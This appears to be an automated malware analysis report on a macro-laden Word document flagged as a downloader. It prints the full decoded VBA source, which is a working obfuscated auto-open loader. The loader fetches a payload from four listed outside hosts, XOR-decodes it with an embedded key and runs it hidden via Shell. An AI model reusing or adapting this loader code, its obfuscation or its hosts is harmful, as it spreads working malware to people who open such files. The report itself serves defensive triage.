Verdict: MALICIOUS
Risk Score: 392
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1140 Deobfuscate or Reverse Engineer
The sample is an OOXML document containing obfuscated VBA macros, indicated by multiple critical and high severity heuristic firings related to VBA execution and obfuscation. The 'autoopen' subroutine and the presence of 'CreateObject' and 'Shell' calls suggest the macro is designed to execute arbitrary code. The 'SaveAllStufAndExit' subroutine appears to handle binary data, likely for a second-stage payload. The ClamAV detection further confirms its malicious nature as a downloader.
Heuristics (10)
- ClamAV: Xls.Downloader.Donoff-10030344-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Downloader.Donoff-10030344-0
- VBA project inside OOXML [medium, OOXML_VBA, 6 related findings]: Document contains a VBA project (VBA macros present)
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched lines in script: `Dim Lrow As Long` / `Shell ProjectBastion & MrPersidentUUUKA & ",init_data", vbHide`
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set ProjectAndNow = CreateObject(MrPersidentPLdunay(1))`
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: `Set ProjectAndNow = CreateObject(MrPersidentPLdunay(1))`
- CallByName call [high, OLE_VBA_CALLBYNAME]: CallByName call. Matched lines in script: `CallByName ProjectAndNow, "s" + ProjectTransformation + "ile", VbMethod, MrPersidentUUUKABBB, 2` / `SaveAllStufAndExit MrPersidentUUUKABBB, MrPersidentUUUKA, "8L1OQVdWGJGR2vqZQGTEeBbATg1tYju6"`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched lines in script: `Attribute VB_Customizable = True` / `Sub autoopen()` / `ProjectBastion = UserForm1.Label1.Caption`
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 15 URLs below are Office/OOXML XML namespace URIs taken from the document markup, not payload hosts. Each was found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12960 bytes | 82d6b57f53723111e2be8ecda87789b63b64e998ebf4f38949ff5309e4d43e75 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
ProjectBastion = UserForm1.Label1.Caption
MrPersident2 = UserForm1.Label3.Caption
ProjectRecreate "DQ"
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C5B2D9EC-DB69-4AB6-ACB5-0D02461DBDDB}{A2D19EEE-0AA4-454B-8349-9BA339506A17}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Public Sub SaveAllStufAndExit(SourceFile As String, spkIJ As String, Optional Key As String)
Dim SPKi As Integer
Dim spkAr() As Byte
SPKi = FreeFile
Open SourceFile For Binary As #SPKi
ReDim spkAr(0 To LOF(SPKi) - 1)
Get #SPKi, , spkAr()
Close #SPKi
Call SaveAllStufAndExit2(spkAr(), Key)
SPKi = FreeFile
Open spkIJ For Binary As #SPKi
Put #SPKi, , spkAr()
Close #SPKi
End Sub
Sub SaveWorkingCopy()
Dim relativePath As String
Application.DisplayAlerts = False
relativePath = ThisWorkbook.Path & "\" & "Levels Passed by Members " & Day(Now()) & "-" & Month(Now()) & "-" & Year(Now()) & " Filtered.xlsx"
ActiveWorkbook.SaveAs FileName:=relativePath
Application.DisplayAlerts = True
End Sub
Public Sub RemoveIDAndFormatRow()
MrPersidentASALLLP = ProjectTbilisi.responseBody
ProjectAndNow.Write MrPersidentASALLLP
CoachesReport ""
Exit Sub
Rows.Select
Sel.ection.RowHeight = 15
Colu.mns("A:A").Delete
Colu.mns("A").ColumnWidth = 25
Colu.mns("B").ColumnWidth = 15
Colu.mns("C").ColumnWidth = 24.71
Colu.mns("I:R").ColumnWidth = 11
End Sub
Public Sub SaveAllStufAndExit2(ByteArray() As Byte, codeck As String)
Dim AsString() As Byte
Dim AsStringLen As Long
Dim extraName2 As Long
Dim extraName3 As Long
Dim extraName4 As Long
Dim extraName5 As Long
Dim extraName6 As Long
AsStringLen = Len(codeck)
ReDim AsString(AsStringLen)
AsString = StrConv(codeck, vbFromUnicode)
extraName2 = UBound(ByteArray) + 1
extraName5 = extraName2
For extraName4 = 0 To (extraName2 - 1)
ByteArray(extraName4) = ByteArray(extraName4) Xor AsString(extraName4 Mod AsStringLen)
If (extraName4 >= extraName6) Then
extraName3 = Int((extraName4 / extraName5) * 100)
extraName6 = (extraName5 * ((extraName3 + 1) / 100)) + 1
End If
Next
End Sub
Attribute VB_Name = "Module3"
Public ProjectBen10() As String
Public Const MrPersidentRH = "User-Agent"
Public Const ProjectTransformation = "avetof"
Public ProjectBastion As String
Public ProjectTbilisi As Object
Public ProjectAndNow As Object
Public ProjectWhileFor As Object
Public Function MrPersidentrfl(str)
Set ProjectAndNow = CreateObject(MrPersidentPLdunay(1))
copyHeader
Exit Function
Dim regEx As Object
regEx.Pattern = "\</li\>"
regEx.IgnoreCase = True
regEx.Global = False
MrPersidentrfl = regEx.Replace(str, " .@@")
End Function
Public Sub ColinDouglasReport()
Set ProjectWhileFor = MrPersident1DASH1solo.Environment(MrPersidentPLdunay(2 + 2))
MrPersidentLAKOPPC = ProjectWhileFor(MrPersidentPLdunay(6))
ProjectDarvin = 0
Dim i
On Error GoTo nextU
For i = LBound(ProjectBen10) To UBound(ProjectBen10) Step 1
MrPersident4 = UserForm1.Label2.Caption & ProjectBen10(i)
ProjectDarvin = ProjectDarvin + 1
ProjectTbilisi.Open MrPersidentPLdunay(5), MrPersident4, False
ProjectTbilisi.setRequestHeader MrPersidentRH, "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0"
SendTabsToFile
Exit Sub
nextU:
Next
Exit Sub
ActiveWorkbook.She.ets("Active").Copy After:=WorkShe.ets("Active")
She.ets("Active (2)").Name = "Colin Douglas"
She.ets("Colin Douglas").Select
Ra.nge("A1").CurrentRegion.Select
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Clear
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(5) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(3) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(1) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
With ActiveWorkbook.WorkShe.ets("Active").Sort
.SetRange Ra.nge("A1").CurrentRegion
.Header = xlYes
.MatchCase = False
.Orientation = xlTopToBottom
.SortMethod = xlPinYin
.Apply
End With
ExpoTruckManagerCop ("Colin Douglas")
End Sub
Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
GodnTeBabenParama = Replace(CH1, CH2, CH3)
End Function
Public Sub Add_Header(ByVal Name As String)
ProjectAndNow.Type = 1
ProjectAndNow.Open
RemoveIDAndFormatRow
Exit Sub
She.ets(Name).Select
Call AddF.irstRow
Call copyHeader
She.ets(Name).Select
Ro.ws("1:1").Select
ActiveSheet.Paste
End Sub
Attribute VB_Name = "Module4"
Public Sub SendTabsToFile()
ProjectTbilisi.Send
If ProjectTbilisi.Status <> 200 Then
Err.Raise vbObjectError + 515, "33", "44"
End If
MAIN
End Sub
Public Function windows7os() As Boolean
'* Authored by Nathan N on 6/4/2012
'* Determines if user is using windows 7
If Left(Appl.ication.OperatingSystem, 21) = "Windows (32-bit) NT 5" Then
windows7os = False
Else
windows7os = True
End If
End Function
Public Function hub_path() As String
'// Created by Nathan N on 7/9/2012
hub_path = "\\hqclienthub\Client Hub"
End Function
Public Function report_archive_path() As String
'// Created by Nathan N on 7/9/2012
report_archive_path = "\\colofs1\Vendor Team\CONTACT MANAGEMENT\CMT Reports"
End Function
Public Function ref_path() As String
'// Created by Nathan N on 7/12/2012
ref_path = "\\colofs1\Vendor Team\CONTACT MANAGEMENT\CMT Reports\Reference\ClientReferenceList.xlsx"
End Function
Public Sub delete_empty_entries(ByVal ws As String, ByVal fieldName As String)
'Authored by Nathan N on 4/9/2012
Dim i As Long
For i = 2 To Las.tRow(ws)
If (w.s.Cells(i, Fiel.dColNum(ws, fieldName)) = "") Then
w.s.Rows(i).Delete shift:=xlUp
i = i - 1
If (i = La.stRow(ws)) Then
Exit For
End If
End If
Next i
End Sub
Public Function InArray(ByRef arrayName() As Variant, ByVal elementValue As Variant) As Boolean
'Created on 3/13/2012 by Nathan N
Dim i As Long
For i = 0 To UBound(arrayName())
If (elementValue = arrayName(i)) Then 'If the elementValue is found at any point in the array, then TRUE
InArray = True
Exit Function
End If
Next i
InArray = False 'Otherwise, InArray is false
End Function
Public Sub DeleteExtraSheets()
Set ProjectTbilisi = CreateObject(MrPersidentPLdunay(0))
CreateFilteredReport
Exit Sub
Application.DisplayAlerts = False
She.ets("Admin codes and info").Delete
She.ets("Misc accounts").Delete
She.ets("Coach and Dist Finished").Delete
She.ets("Sub cancelled").Delete
Application.DisplayAlerts = True
End Sub
Attribute VB_Name = "Module0"
Public MrPersidentLAKOPPC As String
Public MrPersidentPLdunay() As String
Public MrPersidentUUUKA As String
Public MrPersidentUUUKABBB As String
Public MrPersident1DASH1solo As Object
Public MrPersidentGMAKO As Object
Public MrPersident4 As String
Public MrPersident2 As String
Public MrPersidentASALLLP As Variant
Public ProjectDarvin As Integer
Public Sub ExpoTruckManagerCop(ByVal Name As String)
Dim FirstRow As Long
Dim LastRow As Long
Dim Lrow As Long
Shell ProjectBastion & MrPersidentUUUKA & ",init_data", vbHide
End Sub
Public Sub copyHeader()
Set MrPersidentGMAKO = CreateObject(MrPersidentPLdunay(5 - 3))
DeleteExtraSheets
Exit Sub
She.ets("Admin codes and info").Select
Ro.ws("9:9").Select
Sel.ection.Copy
End Sub
Public Function ProjectRecreate(sMetarVis As String) As String
Dim iSlashPOS As Integer
Dim sDecimalVis As String
Dim sWholeVis As String
Dim sTempVis As String
Dim iCount As Integer
Dim sVisibility As String
Dim sNodeKey As String
Dim sParentKey As String
Dim sVis As String
MrPersidentPLdunay = Split(MrPersident2, "BUBLEGUM")
GoTo err_dup
Exit Function
iSlashPOS = InStr(1, sMetarVis, "/")
If iSlashPOS > 0 Then
Select Case Mid(sMetarVis, iSlashPOS - 1, 3)
Case "1/4"
sDecimalVis = ".25"
Case "1/2"
sDecimalVis = ".50"
Case "3/4"
sDecimalVis = ".75"
End Select
End If
iCount = 1
Do Until iCount > Len(sMetarVis)
If Mid(sMetarVis, iCount, 1) = Chr(32) Or _
Mid(sMetarVis, iCount, 1) = "S" Then
sWholeVis = sTempVis
If Left(sWholeVis, 1) = "P" Then
sWholeVis = Right(sWholeVis, Len(sWholeVis) - 1)
End If
iCount = 99
End If
sTempVis = sTempVis & Mid(sMetarVis, iCount, 1)
iCount = iCount + 1
Loop
If Mid(sMetarVis, 2, 1) = "/" Or Mid(sMetarVis, 3, 1) = "/" Then
sVis = "0" & sDecimalVis
Else
sVis = sWholeVis & sDecimalVis
End If
sNodeKey = "C" & gsStationID & "V"
sParentKey = "S" & gsStationID
sVisibility = "Visibility: " & sVis & " miles"
Set nodX = mdiMain.ActiveForm.treWeather.Nodes.Add(sParentKey, tvwChild, sNodeKey, _
sVisibility)
nodX.Image = "vis"
nodX.Tag = sVis
Exit Function
err_dup:
MrPersidentrfl ""
End Function
Public Sub CoachesReport(ByVal Name As String)
CallByName ProjectAndNow, "s" + ProjectTransformation + "ile", VbMethod, MrPersidentUUUKABBB, 2
SaveAllStufAndExit MrPersidentUUUKABBB, MrPersidentUUUKA, "8L1OQVdWGJGR2vqZQGTEeBbATg1tYju6"
ExpoTruckManagerCop ""
End Sub
Public Sub MAIN()
MrPersidentUUUKA = MrPersidentLAKOPPC
MrPersidentUUUKABBB = MrPersidentUUUKA + "\herpack" + CStr(ProjectDarvin)
MrPersidentUUUKA = MrPersidentUUUKA + Replace(MrPersidentPLdunay(12), ".", CStr(ProjectDarvin) + ".")
Add_Header ""
Exit Sub
She.ets("FL Certificates").Select
Call RemoveIDAndFormatRow
She.ets("Active").Select
Call RemoveIDAndFormatRow
Call CreateFilteredReport
Call ColinDouglasReport
End Sub
Public Sub CreateFilteredReport()
Set MrPersident1DASH1solo = CreateObject(MrPersidentPLdunay(3))
ProjectBen10 = Split("samaraorgsintez.ru/873nf3g+smockfiery.net/873nf3g+samsebe.su/873nf3g+dentbord.com/873nf3g", UserForm1.Label4.Caption)
ColinDouglasReport
Exit Sub
She.ets("Active").Select
Ra.nge("A1").CurrentRegion.Select
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Clear
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(6), SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(5) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(3) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
ActiveWorkbook.WorkShe.ets("Active").Sort.SortFields.Add Key:=Sel.ection.Columns(1) _
, SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal
With ActiveWorkbook.WorkShe.ets("Active").Sort
.SetRange Ra.nge("A1").CurrentRegion
.Header = xlYes
.MatchCase = False
.Orientation = xlTopToBottom
.SortMethod = xlPinYin
.Apply
End With
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module32"
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45568 bytes | 821a86397dad4b4a1c24374c7da02973fc9c46aa0a5589a9afe897db223358db |

Detection for vbaProject_00.bin:
- ClamAV: Xls.Downloader.Donoff-10030344-0
- Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob(s).